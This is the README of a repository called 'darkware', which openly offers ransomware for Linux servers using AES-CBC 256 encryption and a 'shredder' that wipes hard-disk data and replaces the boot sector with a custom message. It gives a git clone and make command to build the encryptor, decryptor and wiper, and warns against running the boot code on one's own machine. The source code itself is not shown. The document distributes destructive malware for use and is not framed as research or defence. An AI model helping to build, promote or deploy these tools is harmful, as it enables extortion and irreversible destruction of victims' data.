## darkware - Ransomware infect linux Server/Distro

##### Ransomware with AES-CBC 256 MODE && also a tool which can wipe hdd data, and replace it with a message of your choice..

## Install:
```bash
git clone git@gitlab.com:BL4CKS3C/darkware.git && cd darkware && make
```

## How to:
###### make darkwarenc && make darkwardec : generate encrypt/decrypt tool
###### make shredder : generate shredder 
## WARNING:
##### Boot msg is in boot.asm file you can change it but be careful don't run it in ur machine !!!!

## Issues:
##### IF u have any IDEAS/PROBLEM/ANYTHING i can solve it just create Issues :)